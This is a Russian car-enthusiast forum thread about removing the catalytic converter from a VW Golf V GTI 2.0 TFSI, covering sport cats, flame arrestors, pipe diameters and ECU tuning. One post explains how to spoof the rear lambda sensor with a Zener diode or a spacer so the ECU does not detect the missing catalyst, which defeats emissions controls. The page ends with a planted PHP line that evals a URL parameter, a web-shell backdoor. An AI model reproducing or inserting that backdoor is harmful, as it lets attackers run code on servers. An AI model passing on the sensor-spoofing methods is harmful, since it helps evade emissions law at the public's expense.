+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя
Показано с 1 по 10 из 28

Тема: Удаление Катализатора На 2.0 Tfsi


  1. #1
    Жгун Года 2010 КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough Аватар для КИБАЛЬЧИШЬ
    Регистрация
    14.04.2008
    Сообщений
    2,346
    Хочу удалить катализатор к чертям собачим...
    Вобщем перерыл все но так и не нашел информации
    (все только про 1.8 Т)...
    Кто то уже делал эту операцию?
    Что лучше делать с лямбдами?
    И что лучше ставить трубу или пламегас???

  2. #2
    Лучше всего - спорткат. пламягасить все равно нужен, если уж кат выкинул, иначе весь выпуск сгорит просто (нутро)

  3. #3
    GTI-Racing chess is on a distinguished road Аватар для chess
    Регистрация
    29.11.2006
    Откуда
    москвабад
    Машина
    CTR ЕК9, MPS K90, vw polo 6r
    Сообщений
    1,603
    +1 за спорткат.
    ну а если спорткат, то грех не сделать весь выпуск.
    подумай об этом.
    каждому своё
    АДМ GTI mkV st1.5 - 2.01.084
    АДМ Civic Type-R EK9 - 1.57.683
    Смоленск Civic Type-R EK9 - 1.47.690
    Нижний Новгород Civic Type-R EK9 - 1.53.472
    Казань Civic Type-R EK9 - 1.43.187
    MRW Civic Type-R EK9 - 2.01.663

  4. #4
    III место Лучший Пилот клуба 2011 Гера has a spectacular aura about Гера has a spectacular aura about Гера has a spectacular aura about Аватар для Гера
    Регистрация
    08.11.2007
    Откуда
    в Москве
    Машина
    Nissan Quest
    Сообщений
    4,674
    <div class='quotetop'>Цитата(chess &#064; Sep 29 2008, 12&#58;28) <{POST_SNAPBACK}></div><div class='quotemain'>+1 за спорткат.
    ну а если спорткат, то грех не сделать весь выпуск.
    подумай об этом.[/b][/quote]
    Дык у него уже есть выпуск&#33; Сам видел - нарядный дюже&#33; Или это только конечная банка?
    Golf V GTI МКПП + REVO k04 Stage 3 + Quiafe LSD + intake air system K&N + sway bars H&R + BSR down pipe + APR`s exhaust + сooler autobahn88 + водитель Сергей - продано...

  5. #5
    Жгун Года 2010 КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough Аватар для КИБАЛЬЧИШЬ
    Регистрация
    14.04.2008
    Сообщений
    2,346
    <div class='quotetop'>Цитата(Гера &#064; Sep 29 2008, 13&#58;57) <{POST_SNAPBACK}></div><div class='quotemain'>Дык у него уже есть выпуск&#33; Сам видел - нарядный дюже&#33; Или это только конечная банка?[/b][/quote]

    У меня только глушитель и спортрезонатор BASTUCK.
    А что даст спорткатализатор??? Ведь сопротивление
    останется
    Ну собсно я хочу выбросить кат не столько по мощностным
    характеристикам, но и из-за звука хочу попробовать что будет.
    Почему на куче 1,8 Т он удален, а на 2.0 будет
    прогорать система? Здесь насколько я понял есть проблема отсутствия
    подпора для турбины.
    Опятьже если кто припомнит кто проводил данную операцию -
    ценнный приз.

  6. #6
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    <div class='quotetop'>Цитата(КИБАЛЬЧИШЬ &#064; Sep 29 2008, 22&#58;23) <{POST_SNAPBACK}></div><div class='quotemain'>У меня только глушитель и спортрезонатор BASTUCK.
    А что даст спорткатализатор??? Ведь сопротивление
    останется
    Ну собсно я хочу выбросить кат не столько по мощностным
    характеристикам, но и из-за звука хочу попробовать что будет.
    Почему на куче 1,8 Т он удален, а на 2.0 будет
    прогорать система? Здесь насколько я понял есть проблема отсутствия
    подпора для турбины.
    Опятьже если кто припомнит кто проводил данную операцию -
    ценнный приз.[/b][/quote]


    спорткаты всегда имеет лучшу пропускную способность чем штатный, это обчно достигается за счет немного большего размера сот и чаще всего за счет увиличение диаметра или формы самого ката.

    При наличии в системе двух резонаторов т.е. вместо катализатора ставится большой резонатор и остается штатный или если трубы меняются на болшие, то и на место штатного ставиться увеличенного диаметра. Долговечность системы от выгорания при этом по практике достаточная.

    Основная проблема при удалении катализатора это програмная корректировка мозгов на ГТИ5 по принципу 1.8Т Г4 у которых встречается только одна лямбда до ката, т.е. ГТИ5 будет уже хуже классом по экологии, но ехать и работать будет абсолютно корректно.
    песок сыпется....не останавливайтесь на достигнутом !

  7. #7
    <div class='quotetop'>Цитата(BON &#064; Sep 30 2008, 10&#58;13) <{POST_SNAPBACK}></div><div class='quotemain'>спорткаты всегда имеет лучшу пропускную способность чем штатный, это обчно достигается за счет немного большего размера сот и чаще всего за счет увиличение диаметра или формы самого ката.

    При наличии в системе двух резонаторов т.е. вместо катализатора ставится большой резонатор и остается штатный или если трубы меняются на болшие, то и на место штатного ставиться увеличенного диаметра. Долговечность системы от выгорания при этом по практике достаточная.

    Основная проблема при удалении катализатора это програмная корректировка мозгов на ГТИ5 по принципу 1.8Т Г4 у которых встречается только одна лямбда до ката, т.е. ГТИ5 будет уже хуже классом по экологии, но ехать и работать будет абсолютно корректно.[/b][/quote]

    абсолютно согласен &#33; делал такую же операцию по удалению ката на 5 гти. выбили кирпич из ката, внутрь него приварили пламегас. пластину. звук прибавился. по мощности ничего сказать не могу. мотор работает корректно, так как 2 лямбда зонд нужен для евро5 да и черт с ним пришлось выбить так как стоковый забился от гавнобензина....так что дерзай &#33;

  8. #8
    Жгун Года 2010 КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough Аватар для КИБАЛЬЧИШЬ
    Регистрация
    14.04.2008
    Сообщений
    2,346
    <div class='quotetop'>Цитата(BON &#064; Sep 30 2008, 09&#58;13) <{POST_SNAPBACK}></div><div class='quotemain'>спорткаты всегда имеет лучшу пропускную способность чем штатный, это обчно достигается за счет немного большего размера сот и чаще всего за счет увиличение диаметра или формы самого ката.

    При наличии в системе двух резонаторов т.е. вместо катализатора ставится большой резонатор и остается штатный или если трубы меняются на болшие, то и на место штатного ставиться увеличенного диаметра. Долговечность системы от выгорания при этом по практике достаточная.

    Основная проблема при удалении катализатора это програмная корректировка мозгов на ГТИ5 по принципу 1.8Т Г4 у которых встречается только одна лямбда до ката, т.е. ГТИ5 будет уже хуже классом по экологии, но ехать и работать будет абсолютно корректно.[/b][/quote]

    ОК. Если я поставлю пламегас(вместо ката) или резонатор который снял
    хотя он и в конце выпускного тракта перед глушителем.
    Как я понимаю еще можно увеличить диаметр тракта, у меня если брать
    BASTUCK то все диаметры соединительных соединений 70 мм., и только при подсоединении
    у стандартного ката она переходит в 61 мм. есть ли возможность построить всю систему
    от турбины на 70 мм.(без ката) т.е. есть ли возможность пустить переходник от турбы
    не на 61 а на 70 мм.???
    А каким образом проводится корректировка программы если я удаляю кат, она нужна
    если я правильно понимаю для того что бы мозги видели что все с качеством выхлопа нормально
    (но как они тогда верно образуют смесь?), кто может заняться корректировкой стандартной программы?
    Спасибо...

  9. #9
    <div class='quotetop'>Цитата(КИБАЛЬЧИШЬ &#064; Oct 1 2008, 00&#58;49) <{POST_SNAPBACK}></div><div class='quotemain'>ОК. Если я поставлю пламегас(вместо ката) или резонатор который снял
    хотя он и в конце выпускного тракта перед глушителем.
    Как я понимаю еще можно увеличить диаметр тракта, у меня если брать
    BASTUCK то все диаметры соединительных соединений 70 мм., и только при подсоединении
    у стандартного ката она переходит в 61 мм. есть ли возможность построить всю систему
    от турбины на 70 мм.(без ката) т.е. есть ли возможность пустить переходник от турбы
    не на 61 а на 70 мм.???
    А каким образом проводится корректировка программы если я удаляю кат, она нужна
    если я правильно понимаю для того что бы мозги видели что все с качеством выхлопа нормально
    (но как они тогда верно образуют смесь?), кто может заняться корректировкой стандартной программы?
    Спасибо...[/b][/quote]
    по поводу диаметра выхлопного тракта, то думаю достать переходник из нержавки с 61 на 70 проблем не составит, вварить его после турбы тоже... так что весь выпуск будет 70 мм. если есть руки и голова,то проблем не вижу.
    у некоторых пиндосских чипов есть режим работы без ката. стандартный мозг анализирует показания лямбда зондов "до" и "после" ката. первый служит для основной корректировки режима работы. второй служит для снижения уровня со. то есть если кат со своей работой не справляется, то второй зонд это ловит и дает сигнал на обеднение смеси. эмуляция правильной работы зонда возможна при помощи диода Зенера (стабилитрона) который дает сдвиг около 0.5 В на выходе второго зонда. таким образом мозг думает что кат работает корректно. еще один вариант заключается в выносе второго зонда из зоны основного потока выхлопных газов на несколько см., путем вваривания проставки. естественно что зонд не находясь в потоке будет иметь другие значения, ниже чем на самом деле.
    по поводу корректировки стандартной программы то кажется у Рево есть готовые решения. так что не стоит заморачиваться.

  10. #10
    Жгун Года 2010 КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough Аватар для КИБАЛЬЧИШЬ
    Регистрация
    14.04.2008
    Сообщений
    2,346
    <div class='quotetop'>Цитата(umidka &#064; Oct 1 2008, 00&#58;39) <{POST_SNAPBACK}></div><div class='quotemain'>по поводу диаметра выхлопного тракта, то думаю достать переходник из нержавки с 61 на 70 проблем не составит, вварить его после турбы тоже... так что весь выпуск будет 70 мм. если есть руки и голова,то проблем не вижу.
    у некоторых пиндосских чипов есть режим работы без ката. стандартный мозг анализирует показания лямбда зондов "до" и "после" ката. первый служит для основной корректировки режима работы. второй служит для снижения уровня со. то есть если кат со своей работой не справляется, то второй зонд это ловит и дает сигнал на обеднение смеси. эмуляция правильной работы зонда возможна при помощи диода Зенера (стабилитрона) который дает сдвиг около 0.5 В на выходе второго зонда. таким образом мозг думает что кат работает корректно. еще один вариант заключается в выносе второго зонда из зоны основного потока выхлопных газов на несколько см., путем вваривания проставки. естественно что зонд не находясь в потоке будет иметь другие значения, ниже чем на самом деле.
    по поводу корректировки стандартной программы то кажется у Рево есть готовые решения. так что не стоит заморачиваться.[/b][/quote]

    Хехе извини но чесно ничего не понял...ладно постараюсь
    поподробнее и более внятно изложить суть вопроса - дело в том что
    я хочу оставить свой чип WETTERAUER, в этом случае нужно менять чип,
    под тот который адаптирован под работу без ката??? правильно я понял
    о чем ты говоришь? Но если все же оставить мой чип, есть путь что бы двигатель
    работал корректно(со всеми тягово-мощностными характеристиками), без надписи EPC?
    По 70 мм. трубе я спрашиваю потому как подумал уж менять так капитально
    (знаю что на некоторые 1,8Т ставили коллектор который идет
    от турбы с увеличеной по сравнению со стандартной дудкой патрубка),
    основной вопрос по увеличенному патрубку. Что это дает положительного? И слышал ли кто о
    существовании такого на 2.0 Т и не причинит
    ли вреда увеличение сечения выпуска???(сейчас скажу умное словосочетание - подпор
    турбины - который вычитал на одном из постов когда искал данную тему от Griffin).

+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя

Похожие темы

  1. удалил оба катализатора
    от NEVO в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 24
    Последнее сообщение: 02.10.2023, 07:27
  2. Замена катализатора на пламягаситель на 2.0 TFSI
    от VAG-DOCTOR в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 17
    Последнее сообщение: 01.10.2023, 22:43
  3. Удаление Катализатора На Г3
    от motor_62 в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 3
    Последнее сообщение: 25.05.2008, 17:48
  4. удаление резонаторов
    от iv_mark в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 12
    Последнее сообщение: 04.04.2008, 03:07
  5. Удаление катализатора на 2.0Т FSI
    от umidka в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 11
    Последнее сообщение: 04.03.2008, 16:13

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}